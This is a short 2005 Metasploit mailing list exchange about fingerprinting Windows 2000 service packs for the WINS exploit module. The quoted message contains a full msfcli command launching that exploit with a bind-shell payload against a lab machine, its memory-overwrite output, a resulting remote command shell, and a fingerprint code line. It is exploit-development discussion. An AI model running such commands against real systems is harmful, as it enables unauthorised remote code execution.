Metasploit mailing list archives
WINS Fingerprint update
From: hdm at metasploit.com (H D Moore)
Date: Wed, 12 Jan 2005 19:31:39 -0600
It is strange that those addresses are the same between service packs. They should point to a location inside ntdll.dll, which changes quite a bit between each SP of Windows 2000. If you get a chance, could you mail me a copy (off-list) of your ntdll.dll file? Thanks!

-HD

On Wednesday 12 January 2005 19:21, grutz at jingojango.net wrote:
> On Wed, Jan 12, 2005 at 02:47:31PM -0800, grutz at jingojango.net brazenly wrote:
> > I didn't have SP4 handy to put on the vm image.
>
> Just put SP4 on Win2KAS and results are the same:
>
> $ ./msfcli wins RHOST=192.168.191.10 PAYLOAD=win32_bind TARGET=0 E
> [*] Starting Bind Handler.
> [*] Pointers: [0x05371e90] 0x053dffa4 0x77f98191 0x77f89640
> [*] Attempting to overwrite 0x053df4c4 with 0x053922e0 (0x05391f40)
> [*] Got connection from 192.168.191.1:3773 <-> 192.168.191.10:4444
>
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-2000 Microsoft Corp.
>
> C:\WINNT\system32>
>
> So for Win2KASsp3, added this line:
>
> $sp = '3' if $ptrs[3] == 0x77f81648; # add for Win2K Advanced Server, SP3